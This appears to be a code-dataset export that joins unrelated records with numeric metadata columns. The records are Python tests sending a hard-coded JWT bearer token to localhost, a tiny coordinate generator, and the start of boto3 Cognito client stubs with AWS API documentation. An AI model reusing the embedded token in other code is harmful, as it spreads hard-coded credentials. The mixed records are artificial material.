token = "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpZCI6IjM2ZGNlNjBiMzg4YjA2NDUyNmI5MDJhOGRjMzIyM2NhNGMxMWFmNWYiLCJqdGkiOiIzNmRjZTYwYjM4OGIwNjQ1MjZiOTAyYThkYzMyMjNjYTRjMTFhZjVmIiwiaXNzIjoiTktHS3RjTndzc1RvUDVmN3Voc0VzNCIsImF1ZCI6InNvZmllLWlvdC5ldSIsInN1YiI6Im15ZGlkIiwiZXhwIjoxNTgxMzQyNDE4LCJpYXQiOjE1ODEzMzg4MTgsInRva2VuX3R5cGUiOiJiZWFyZXIiLCJzY29wZSI6bnVsbH0.XSyQTgTt1WByT46NJLwrlcU3BUXzWf4MDZE3M4bLAh3HwFAwD6Dhi1IVeLAxNscc0bCgS-3KgyD1fdtiiJH7WktQIc269OLNxhnaXun_LxEYrWQCRHIFb0Je8Eg6CvdOB3shrlNZHmVELe6gaU0tQJ0-cdBbuz0udq_Mou1WLEwe6vp3mfgLiuTe2pT4wVI2PldvmUujeH6IpEop1nESYVA06pK6nV08d1RW7c_sRPgJdpSGGv-QhRcxBjDowkUs9J0OaTtGlExKhMv_17P96EskyOqCHku6RyydFccYbd5tl-Wh-9MqI4Me8z3BBSKPiIvQ2mo5OMcBmI0WwXb6jw"
headers = {'Authorization':'Bearer ' + token, 'Accept': 'application/json'}
response = requests.get("http://localhost:9000/secure/jwt", headers = headers)
print(response.text)
assert(response.status_code == 200)
def test_valid_bearer_put(self):
token = "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpZCI6IjM2ZGNlNjBiMzg4YjA2NDUyNmI5MDJhOGRjMzIyM2NhNGMxMWFmNWYiLCJqdGkiOiIzNmRjZTYwYjM4OGIwNjQ1MjZiOTAyYThkYzMyMjNjYTRjMTFhZjVmIiwiaXNzIjoiTktHS3RjTndzc1RvUDVmN3Voc0VzNCIsImF1ZCI6InNvZmllLWlvdC5ldSIsInN1YiI6Im15ZGlkIiwiZXhwIjoxNTgxMzQyNDE4LCJpYXQiOjE1ODEzMzg4MTgsInRva2VuX3R5cGUiOiJiZWFyZXIiLCJzY29wZSI6bnVsbH0.XSyQTgTt1WByT46NJLwrlcU3BUXzWf4MDZE3M4bLAh3HwFAwD6Dhi1IVeLAxNscc0bCgS-3KgyD1fdtiiJH7WktQIc269OLNxhnaXun_LxEYrWQCRHIFb0Je8Eg6CvdOB3shrlNZHmVELe6gaU0tQJ0-cdBbuz0udq_Mou1WLEwe6vp3mfgLiuTe2pT4wVI2PldvmUujeH6IpEop1nESYVA06pK6nV08d1RW7c_sRPgJdpSGGv-QhRcxBjDowkUs9J0OaTtGlExKhMv_17P96EskyOqCHku6RyydFccYbd5tl-Wh-9MqI4Me8z3BBSKPiIvQ2mo5OMcBmI0WwXb6jw"
headers = {'Authorization':'Bearer ' + token, 'Content-Type': 'application/json', 'Accept': 'application/json'}
data = {'on': False}
response = requests.put("http://localhost:9000/secure/jwt", headers = headers, data = json.dumps(data))
print(response.text)
assert(response.status_code == 200)
def test_valid_default_get(self):
headers = {'Accept': 'application/json'}
response = requests.get("http://localhost:9000/randomURL", headers = headers)
print(response.text)
assert(response.status_code == 200)
| 91.615385
| 709
| 0.843409
| 134
| 2,382
| 14.843284
| 0.373134
| 0.030166
| 0.0181
| 0.034691
| 0.898441
| 0.898441
| 0.898441
| 0.873806
| 0.873806
| 0.816491
| 0
| 0.091959
| 0.09152
| 2,382
| 26
| 710
| 91.615385
| 0.827172
| 0
| 0
| 0.363636
| 0
| 0
| 0.676878
| 0.579941
| 0
| 0
| 0
| 0
| 0.136364
| 1
| 0.136364
| false
| 0
| 0.136364
| 0
| 0.318182
| 0.136364
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
c2d4bab5ba5e67753a37ca8915c57490bdbd4e36
| 8
|
py
|
Python
|
codemach/tests/source/comp_equal.py
|
chuck1/myexecutor
|
6b70d2e7bc9ace0efde8e38f75be2b928393bfdf
|
[
"MIT"
] | null | null | null |
codemach/tests/source/comp_equal.py
|
chuck1/myexecutor
|
6b70d2e7bc9ace0efde8e38f75be2b928393bfdf
|
[
"MIT"
] | 37
|
2017-06-29T22:42:08.000Z
|
2019-01-22T18:22:57.000Z
|
codemach/tests/source/comp_equal.py
|
chuck1/myexecutor
|
6b70d2e7bc9ace0efde8e38f75be2b928393bfdf
|
[
"MIT"
] | null | null | null |
2 == 3
| 2.666667
| 6
| 0.25
| 2
| 8
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.5
| 0.5
| 8
| 2
| 7
| 4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6696a49079f374ae5ff3d70f4a8b560e28a0ab8a
| 396
|
py
|
Python
|
coord_generator/__init__.py
|
DevER-M/coord_generator
|
8586620f928a10652ee65d2b6573cc04b9ca8ee0
|
[
"MIT"
] | null | null | null |
coord_generator/__init__.py
|
DevER-M/coord_generator
|
8586620f928a10652ee65d2b6573cc04b9ca8ee0
|
[
"MIT"
] | null | null | null |
coord_generator/__init__.py
|
DevER-M/coord_generator
|
8586620f928a10652ee65d2b6573cc04b9ca8ee0
|
[
"MIT"
] | null | null | null |
import random
def generate_coordinates(min_num,max_num):
for coords in range(1):
x = random.randint(min_num,max_num)
y = random.randint(min_num,max_num)
z = random.randint(min_num,max_num)
return x,y,z
def generate_XandY_coordinates(min_num,max_num,):
for coords in range(1):
x = random.randint(min_num,max_num)
y = random.randint(min_num,max_num)
return x,y
| 33
| 50
| 0.714646
| 69
| 396
| 3.855072
| 0.275362
| 0.157895
| 0.236842
| 0.315789
| 0.845865
| 0.845865
| 0.845865
| 0.845865
| 0.845865
| 0.691729
| 0
| 0.006135
| 0.176768
| 396
| 12
| 51
| 33
| 0.809816
| 0
| 0
| 0.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0
| 0.083333
| 0
| 0.416667
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
6699abc0bf1069954ff90fb99ad6477dda89078c
| 387,233
|
py
|
Python
|
boto3_type_annotations_with_docs/boto3_type_annotations/cognito_idp/client.py
|
cowboygneox/boto3_type_annotations
|
450dce1de4e066b939de7eac2ec560ed1a7ddaa2
|
[
"MIT"
] | 119
|
2018-12-01T18:20:57.000Z
|
2022-02-02T10:31:29.000Z
|
boto3_type_annotations_with_docs/boto3_type_annotations/cognito_idp/client.py
|
cowboygneox/boto3_type_annotations
|
450dce1de4e066b939de7eac2ec560ed1a7ddaa2
|
[
"MIT"
] | 15
|
2018-11-16T00:16:44.000Z
|
2021-11-13T03:44:18.000Z
|
boto3_type_annotations_with_docs/boto3_type_annotations/cognito_idp/client.py
|
cowboygneox/boto3_type_annotations
|
450dce1de4e066b939de7eac2ec560ed1a7ddaa2
|
[
"MIT"
] | 11
|
2019-05-06T05:26:51.000Z
|
2021-09-28T15:27:59.000Z
|
from typing import Optional
from botocore.client import BaseClient
from typing import Dict
from botocore.paginate import Paginator
from botocore.waiter import Waiter
from typing import Union
from typing import List
class Client(BaseClient):
def add_custom_attributes(self, UserPoolId: str, CustomAttributes: List) -> Dict:
"""
Adds additional user attributes to the user pool schema.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AddCustomAttributes>`_
**Request Syntax**
::
response = client.add_custom_attributes(
UserPoolId='string',
CustomAttributes=[
{
'Name': 'string',
'AttributeDataType': 'String'|'Number'|'DateTime'|'Boolean',
'DeveloperOnlyAttribute': True|False,
'Mutable': True|False,
'Required': True|False,
'NumberAttributeConstraints': {
'MinValue': 'string',
'MaxValue': 'string'
},
'StringAttributeConstraints': {
'MinLength': 'string',
'MaxLength': 'string'
}
},
]
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
Represents the response from the server for the request to add custom attributes.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID for the user pool where you want to add custom attributes.
:type CustomAttributes: list
:param CustomAttributes: **[REQUIRED]**
An array of custom attributes, such as Mutable and Name.
- *(dict) --*
Contains information about the schema attribute.
- **Name** *(string) --*
A schema attribute of the name type.
- **AttributeDataType** *(string) --*
The attribute data type.
- **DeveloperOnlyAttribute** *(boolean) --*
Specifies whether the attribute type is developer only.
- **Mutable** *(boolean) --*
Specifies whether the value of the attribute can be changed.
For any user pool attribute that\'s mapped to an identity provider attribute, you must set this parameter to ``true`` . Amazon Cognito updates mapped attributes when users sign in to your application through an identity provider. If an attribute is immutable, Amazon Cognito throws an error when it attempts to update the attribute. For more information, see `Specifying Identity Provider Attribute Mappings for Your User Pool <https://docs.aws.amazon.com/cognito/latest/developerguide/cognito-user-pools-specifying-attribute-mapping.html>`__ .
- **Required** *(boolean) --*
Specifies whether a user pool attribute is required. If the attribute is required and the user does not provide a value, registration or sign-in will fail.
- **NumberAttributeConstraints** *(dict) --*
Specifies the constraints for an attribute of the number type.
- **MinValue** *(string) --*
The minimum value of an attribute that is of the number data type.
- **MaxValue** *(string) --*
The maximum value of an attribute that is of the number data type.
- **StringAttributeConstraints** *(dict) --*
Specifies the constraints for an attribute of the string type.
- **MinLength** *(string) --*
The minimum length.
- **MaxLength** *(string) --*
The maximum length.
:rtype: dict
:returns:
"""
pass
def admin_add_user_to_group(self, UserPoolId: str, Username: str, GroupName: str):
"""
Adds the specified user to the specified group.
Requires developer credentials.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AdminAddUserToGroup>`_
**Request Syntax**
::
response = client.admin_add_user_to_group(
UserPoolId='string',
Username='string',
GroupName='string'
)
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID for the user pool.
:type Username: string
:param Username: **[REQUIRED]**
The username for the user.
:type GroupName: string
:param GroupName: **[REQUIRED]**
The group name.
:returns: None
"""
pass
def admin_confirm_sign_up(self, UserPoolId: str, Username: str) -> Dict:
"""
Confirms user registration as an admin without using a confirmation code. Works on any user.
Requires developer credentials.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AdminConfirmSignUp>`_
**Request Syntax**
::
response = client.admin_confirm_sign_up(
UserPoolId='string',
Username='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
Represents the response from the server for the request to confirm registration.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID for which you want to confirm user registration.
:type Username: string
:param Username: **[REQUIRED]**
The user name for which you want to confirm user registration.
:rtype: dict
:returns:
"""
pass
def admin_create_user(self, UserPoolId: str, Username: str, UserAttributes: List = None, ValidationData: List = None, TemporaryPassword: str = None, ForceAliasCreation: bool = None, MessageAction: str = None, DesiredDeliveryMediums: List = None) -> Dict:
"""
Creates a new user in the specified user pool.
If ``MessageAction`` is not set, the default is to send a welcome message via email or phone (SMS).
.. note::
This message is based on a template that you configured in your call to or . This template includes your custom sign-up instructions and placeholders for user name and temporary password.
Alternatively, you can call AdminCreateUser with “SUPPRESS” for the ``MessageAction`` parameter, and Amazon Cognito will not send any email.
In either case, the user will be in the ``FORCE_CHANGE_PASSWORD`` state until they sign in and change their password.
AdminCreateUser requires developer credentials.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AdminCreateUser>`_
**Request Syntax**
::
response = client.admin_create_user(
UserPoolId='string',
Username='string',
UserAttributes=[
{
'Name': 'string',
'Value': 'string'
},
],
ValidationData=[
{
'Name': 'string',
'Value': 'string'
},
],
TemporaryPassword='string',
ForceAliasCreation=True|False,
MessageAction='RESEND'|'SUPPRESS',
DesiredDeliveryMediums=[
'SMS'|'EMAIL',
]
)
**Response Syntax**
::
{
'User': {
'Username': 'string',
'Attributes': [
{
'Name': 'string',
'Value': 'string'
},
],
'UserCreateDate': datetime(2015, 1, 1),
'UserLastModifiedDate': datetime(2015, 1, 1),
'Enabled': True|False,
'UserStatus': 'UNCONFIRMED'|'CONFIRMED'|'ARCHIVED'|'COMPROMISED'|'UNKNOWN'|'RESET_REQUIRED'|'FORCE_CHANGE_PASSWORD',
'MFAOptions': [
{
'DeliveryMedium': 'SMS'|'EMAIL',
'AttributeName': 'string'
},
]
}
}
**Response Structure**
- *(dict) --*
Represents the response from the server to the request to create the user.
- **User** *(dict) --*
The newly created user.
- **Username** *(string) --*
The user name of the user you wish to describe.
- **Attributes** *(list) --*
A container with information about the user type attributes.
- *(dict) --*
Specifies whether the attribute is standard or custom.
- **Name** *(string) --*
The name of the attribute.
- **Value** *(string) --*
The value of the attribute.
- **UserCreateDate** *(datetime) --*
The creation date of the user.
- **UserLastModifiedDate** *(datetime) --*
The last modified date of the user.
- **Enabled** *(boolean) --*
Specifies whether the user is enabled.
- **UserStatus** *(string) --*
The user status. Can be one of the following:
* UNCONFIRMED - User has been created but not confirmed.
* CONFIRMED - User has been confirmed.
* ARCHIVED - User is no longer active.
* COMPROMISED - User is disabled due to a potential security threat.
* UNKNOWN - User status is not known.
* RESET_REQUIRED - User is confirmed, but the user must request a code and reset his or her password before he or she can sign in.
* FORCE_CHANGE_PASSWORD - The user is confirmed and the user can sign in using a temporary password, but on first sign-in, the user must change his or her password to a new value before doing anything else.
- **MFAOptions** *(list) --*
The MFA options for the user.
- *(dict) --*
Specifies the different settings for multi-factor authentication (MFA).
- **DeliveryMedium** *(string) --*
The delivery medium (email message or SMS message) to send the MFA code.
- **AttributeName** *(string) --*
The attribute name of the MFA option type.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID for the user pool where the user will be created.
:type Username: string
:param Username: **[REQUIRED]**
The username for the user. Must be unique within the user pool. Must be a UTF-8 string between 1 and 128 characters. After the user is created, the username cannot be changed.
:type UserAttributes: list
:param UserAttributes:
An array of name-value pairs that contain user attributes and attribute values to be set for the user to be created. You can create a user without specifying any attributes other than ``Username`` . However, any attributes that you specify as required (in or in the **Attributes** tab of the console) must be supplied either by you (in your call to ``AdminCreateUser`` ) or by the user (when he or she signs up in response to your welcome message).
For custom attributes, you must prepend the ``custom:`` prefix to the attribute name.
To send a message inviting the user to sign up, you must specify the user\'s email address or phone number. This can be done in your call to AdminCreateUser or in the **Users** tab of the Amazon Cognito console for managing your user pools.
In your call to ``AdminCreateUser`` , you can set the ``email_verified`` attribute to ``True`` , and you can set the ``phone_number_verified`` attribute to ``True`` . (You can also do this by calling .)
* **email** : The email address of the user to whom the message that contains the code and username will be sent. Required if the ``email_verified`` attribute is set to ``True`` , or if ``\"EMAIL\"`` is specified in the ``DesiredDeliveryMediums`` parameter.
* **phone_number** : The phone number of the user to whom the message that contains the code and username will be sent. Required if the ``phone_number_verified`` attribute is set to ``True`` , or if ``\"SMS\"`` is specified in the ``DesiredDeliveryMediums`` parameter.
- *(dict) --*
Specifies whether the attribute is standard or custom.
- **Name** *(string) --* **[REQUIRED]**
The name of the attribute.
- **Value** *(string) --*
The value of the attribute.
:type ValidationData: list
:param ValidationData:
The user\'s validation data. This is an array of name-value pairs that contain user attributes and attribute values that you can use for custom validation, such as restricting the types of user accounts that can be registered. For example, you might choose to allow or disallow user sign-up based on the user\'s domain.
To configure custom validation, you must create a Pre Sign-up Lambda trigger for the user pool as described in the Amazon Cognito Developer Guide. The Lambda trigger receives the validation data and uses it in the validation process.
The user\'s validation data is not persisted.
- *(dict) --*
Specifies whether the attribute is standard or custom.
- **Name** *(string) --* **[REQUIRED]**
The name of the attribute.
- **Value** *(string) --*
The value of the attribute.
:type TemporaryPassword: string
:param TemporaryPassword:
The user\'s temporary password. This password must conform to the password policy that you specified when you created the user pool.
The temporary password is valid only once. To complete the Admin Create User flow, the user must enter the temporary password in the sign-in page along with a new password to be used in all future sign-ins.
This parameter is not required. If you do not specify a value, Amazon Cognito generates one for you.
The temporary password can only be used until the user account expiration limit that you specified when you created the user pool. To reset the account after that time limit, you must call ``AdminCreateUser`` again, specifying ``\"RESEND\"`` for the ``MessageAction`` parameter.
:type ForceAliasCreation: boolean
:param ForceAliasCreation:
This parameter is only used if the ``phone_number_verified`` or ``email_verified`` attribute is set to ``True`` . Otherwise, it is ignored.
If this parameter is set to ``True`` and the phone number or email address specified in the UserAttributes parameter already exists as an alias with a different user, the API call will migrate the alias from the previous user to the newly created user. The previous user will no longer be able to log in using that alias.
If this parameter is set to ``False`` , the API throws an ``AliasExistsException`` error if the alias already exists. The default value is ``False`` .
:type MessageAction: string
:param MessageAction:
Set to ``\"RESEND\"`` to resend the invitation message to a user that already exists and reset the expiration limit on the user\'s account. Set to ``\"SUPPRESS\"`` to suppress sending the message. Only one value can be specified.
:type DesiredDeliveryMediums: list
:param DesiredDeliveryMediums:
Specify ``\"EMAIL\"`` if email will be used to send the welcome message. Specify ``\"SMS\"`` if the phone number will be used. The default value is ``\"SMS\"`` . More than one value can be specified.
- *(string) --*
:rtype: dict
:returns:
"""
pass
def admin_delete_user(self, UserPoolId: str, Username: str):
"""
Deletes a user as an administrator. Works on any user.
Requires developer credentials.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AdminDeleteUser>`_
**Request Syntax**
::
response = client.admin_delete_user(
UserPoolId='string',
Username='string'
)
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID for the user pool where you want to delete the user.
:type Username: string
:param Username: **[REQUIRED]**
The user name of the user you wish to delete.
:returns: None
"""
pass
def admin_delete_user_attributes(self, UserPoolId: str, Username: str, UserAttributeNames: List) -> Dict:
"""
Deletes the user attributes in a user pool as an administrator. Works on any user.
Requires developer credentials.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AdminDeleteUserAttributes>`_
**Request Syntax**
::
response = client.admin_delete_user_attributes(
UserPoolId='string',
Username='string',
UserAttributeNames=[
'string',
]
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
Represents the response received from the server for a request to delete user attributes.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID for the user pool where you want to delete user attributes.
:type Username: string
:param Username: **[REQUIRED]**
The user name of the user from which you would like to delete attributes.
:type UserAttributeNames: list
:param UserAttributeNames: **[REQUIRED]**
An array of strings representing the user attribute names you wish to delete.
For custom attributes, you must prepend the ``custom:`` prefix to the attribute name.
- *(string) --*
:rtype: dict
:returns:
"""
pass
def admin_disable_provider_for_user(self, UserPoolId: str, User: Dict) -> Dict:
"""
Disables the user from signing in with the specified external (SAML or social) identity provider. If the user to disable is a Cognito User Pools native username + password user, they are not permitted to use their password to sign-in. If the user to disable is a linked external IdP user, any link between that user and an existing user is removed. The next time the external user (no longer attached to the previously linked ``DestinationUser`` ) signs in, they must create a new user account. See .
This action is enabled only for admin access and requires developer credentials.
The ``ProviderName`` must match the value specified when creating an IdP for the pool.
To disable a native username + password user, the ``ProviderName`` value must be ``Cognito`` and the ``ProviderAttributeName`` must be ``Cognito_Subject`` , with the ``ProviderAttributeValue`` being the name that is used in the user pool for the user.
The ``ProviderAttributeName`` must always be ``Cognito_Subject`` for social identity providers. The ``ProviderAttributeValue`` must always be the exact subject that was used when the user was originally linked as a source user.
For de-linking a SAML identity, there are two scenarios. If the linked identity has not yet been used to sign-in, the ``ProviderAttributeName`` and ``ProviderAttributeValue`` must be the same values that were used for the ``SourceUser`` when the identities were originally linked in the call. (If the linking was done with ``ProviderAttributeName`` set to ``Cognito_Subject`` , the same applies here). However, if the user has already signed in, the ``ProviderAttributeName`` must be ``Cognito_Subject`` and ``ProviderAttributeValue`` must be the subject of the SAML assertion.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AdminDisableProviderForUser>`_
**Request Syntax**
::
response = client.admin_disable_provider_for_user(
UserPoolId='string',
User={
'ProviderName': 'string',
'ProviderAttributeName': 'string',
'ProviderAttributeValue': 'string'
}
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID for the user pool.
:type User: dict
:param User: **[REQUIRED]**
The user to be disabled.
- **ProviderName** *(string) --*
The name of the provider, for example, Facebook, Google, or Login with Amazon.
- **ProviderAttributeName** *(string) --*
The name of the provider attribute to link to, for example, ``NameID`` .
- **ProviderAttributeValue** *(string) --*
The value of the provider attribute to link to, for example, ``xxxxx_account`` .
:rtype: dict
:returns:
"""
pass
def admin_disable_user(self, UserPoolId: str, Username: str) -> Dict:
"""
Disables the specified user as an administrator. Works on any user.
Requires developer credentials.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AdminDisableUser>`_
**Request Syntax**
::
response = client.admin_disable_user(
UserPoolId='string',
Username='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
Represents the response received from the server to disable the user as an administrator.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID for the user pool where you want to disable the user.
:type Username: string
:param Username: **[REQUIRED]**
The user name of the user you wish to disable.
:rtype: dict
:returns:
"""
pass
def admin_enable_user(self, UserPoolId: str, Username: str) -> Dict:
"""
Enables the specified user as an administrator. Works on any user.
Requires developer credentials.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AdminEnableUser>`_
**Request Syntax**
::
response = client.admin_enable_user(
UserPoolId='string',
Username='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
Represents the response from the server for the request to enable a user as an administrator.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID for the user pool where you want to enable the user.
:type Username: string
:param Username: **[REQUIRED]**
The user name of the user you wish to enable.
:rtype: dict
:returns:
"""
pass
def admin_forget_device(self, UserPoolId: str, Username: str, DeviceKey: str):
"""
Forgets the device, as an administrator.
Requires developer credentials.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AdminForgetDevice>`_
**Request Syntax**
::
response = client.admin_forget_device(
UserPoolId='string',
Username='string',
DeviceKey='string'
)
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID.
:type Username: string
:param Username: **[REQUIRED]**
The user name.
:type DeviceKey: string
:param DeviceKey: **[REQUIRED]**
The device key.
:returns: None
"""
pass
def admin_get_device(self, DeviceKey: str, UserPoolId: str, Username: str) -> Dict:
"""
Gets the device, as an administrator.
Requires developer credentials.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AdminGetDevice>`_
**Request Syntax**
::
response = client.admin_get_device(
DeviceKey='string',
UserPoolId='string',
Username='string'
)
**Response Syntax**
::
{
'Device': {
'DeviceKey': 'string',
'DeviceAttributes': [
{
'Name': 'string',
'Value': 'string'
},
],
'DeviceCreateDate': datetime(2015, 1, 1),
'DeviceLastModifiedDate': datetime(2015, 1, 1),
'DeviceLastAuthenticatedDate': datetime(2015, 1, 1)
}
}
**Response Structure**
- *(dict) --*
Gets the device response, as an administrator.
- **Device** *(dict) --*
The device.
- **DeviceKey** *(string) --*
The device key.
- **DeviceAttributes** *(list) --*
The device attributes.
- *(dict) --*
Specifies whether the attribute is standard or custom.
- **Name** *(string) --*
The name of the attribute.
- **Value** *(string) --*
The value of the attribute.
- **DeviceCreateDate** *(datetime) --*
The creation date of the device.
- **DeviceLastModifiedDate** *(datetime) --*
The last modified date of the device.
- **DeviceLastAuthenticatedDate** *(datetime) --*
The date in which the device was last authenticated.
:type DeviceKey: string
:param DeviceKey: **[REQUIRED]**
The device key.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID.
:type Username: string
:param Username: **[REQUIRED]**
The user name.
:rtype: dict
:returns:
"""
pass
def admin_get_user(self, UserPoolId: str, Username: str) -> Dict:
"""
Gets the specified user by user name in a user pool as an administrator. Works on any user.
Requires developer credentials.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AdminGetUser>`_
**Request Syntax**
::
response = client.admin_get_user(
UserPoolId='string',
Username='string'
)
**Response Syntax**
::
{
'Username': 'string',
'UserAttributes': [
{
'Name': 'string',
'Value': 'string'
},
],
'UserCreateDate': datetime(2015, 1, 1),
'UserLastModifiedDate': datetime(2015, 1, 1),
'Enabled': True|False,
'UserStatus': 'UNCONFIRMED'|'CONFIRMED'|'ARCHIVED'|'COMPROMISED'|'UNKNOWN'|'RESET_REQUIRED'|'FORCE_CHANGE_PASSWORD',
'MFAOptions': [
{
'DeliveryMedium': 'SMS'|'EMAIL',
'AttributeName': 'string'
},
],
'PreferredMfaSetting': 'string',
'UserMFASettingList': [
'string',
]
}
**Response Structure**
- *(dict) --*
Represents the response from the server from the request to get the specified user as an administrator.
- **Username** *(string) --*
The user name of the user about whom you are receiving information.
- **UserAttributes** *(list) --*
An array of name-value pairs representing user attributes.
- *(dict) --*
Specifies whether the attribute is standard or custom.
- **Name** *(string) --*
The name of the attribute.
- **Value** *(string) --*
The value of the attribute.
- **UserCreateDate** *(datetime) --*
The date the user was created.
- **UserLastModifiedDate** *(datetime) --*
The date the user was last modified.
- **Enabled** *(boolean) --*
Indicates that the status is enabled.
- **UserStatus** *(string) --*
The user status. Can be one of the following:
* UNCONFIRMED - User has been created but not confirmed.
* CONFIRMED - User has been confirmed.
* ARCHIVED - User is no longer active.
* COMPROMISED - User is disabled due to a potential security threat.
* UNKNOWN - User status is not known.
* RESET_REQUIRED - User is confirmed, but the user must request a code and reset his or her password before he or she can sign in.
* FORCE_CHANGE_PASSWORD - The user is confirmed and the user can sign in using a temporary password, but on first sign-in, the user must change his or her password to a new value before doing anything else.
- **MFAOptions** *(list) --*
Specifies the options for MFA (e.g., email or phone number).
- *(dict) --*
Specifies the different settings for multi-factor authentication (MFA).
- **DeliveryMedium** *(string) --*
The delivery medium (email message or SMS message) to send the MFA code.
- **AttributeName** *(string) --*
The attribute name of the MFA option type.
- **PreferredMfaSetting** *(string) --*
The user's preferred MFA setting.
- **UserMFASettingList** *(list) --*
The list of the user's MFA settings.
- *(string) --*
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID for the user pool where you want to get information about the user.
:type Username: string
:param Username: **[REQUIRED]**
The user name of the user you wish to retrieve.
:rtype: dict
:returns:
"""
pass
def admin_initiate_auth(self, UserPoolId: str, ClientId: str, AuthFlow: str, AuthParameters: Dict = None, ClientMetadata: Dict = None, AnalyticsMetadata: Dict = None, ContextData: Dict = None) -> Dict:
"""
Initiates the authentication flow, as an administrator.
Requires developer credentials.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AdminInitiateAuth>`_
**Request Syntax**
::
response = client.admin_initiate_auth(
UserPoolId='string',
ClientId='string',
AuthFlow='USER_SRP_AUTH'|'REFRESH_TOKEN_AUTH'|'REFRESH_TOKEN'|'CUSTOM_AUTH'|'ADMIN_NO_SRP_AUTH'|'USER_PASSWORD_AUTH',
AuthParameters={
'string': 'string'
},
ClientMetadata={
'string': 'string'
},
AnalyticsMetadata={
'AnalyticsEndpointId': 'string'
},
ContextData={
'IpAddress': 'string',
'ServerName': 'string',
'ServerPath': 'string',
'HttpHeaders': [
{
'headerName': 'string',
'headerValue': 'string'
},
],
'EncodedData': 'string'
}
)
**Response Syntax**
::
{
'ChallengeName': 'SMS_MFA'|'SOFTWARE_TOKEN_MFA'|'SELECT_MFA_TYPE'|'MFA_SETUP'|'PASSWORD_VERIFIER'|'CUSTOM_CHALLENGE'|'DEVICE_SRP_AUTH'|'DEVICE_PASSWORD_VERIFIER'|'ADMIN_NO_SRP_AUTH'|'NEW_PASSWORD_REQUIRED',
'Session': 'string',
'ChallengeParameters': {
'string': 'string'
},
'AuthenticationResult': {
'AccessToken': 'string',
'ExpiresIn': 123,
'TokenType': 'string',
'RefreshToken': 'string',
'IdToken': 'string',
'NewDeviceMetadata': {
'DeviceKey': 'string',
'DeviceGroupKey': 'string'
}
}
}
**Response Structure**
- *(dict) --*
Initiates the authentication response, as an administrator.
- **ChallengeName** *(string) --*
The name of the challenge which you are responding to with this call. This is returned to you in the ``AdminInitiateAuth`` response if you need to pass another challenge.
* ``MFA_SETUP`` : If MFA is required, users who do not have at least one of the MFA methods set up are presented with an ``MFA_SETUP`` challenge. The user must set up at least one MFA type to continue to authenticate.
* ``SELECT_MFA_TYPE`` : Selects the MFA type. Valid MFA options are ``SMS_MFA`` for text SMS MFA, and ``SOFTWARE_TOKEN_MFA`` for TOTP software token MFA.
* ``SMS_MFA`` : Next challenge is to supply an ``SMS_MFA_CODE`` , delivered via SMS.
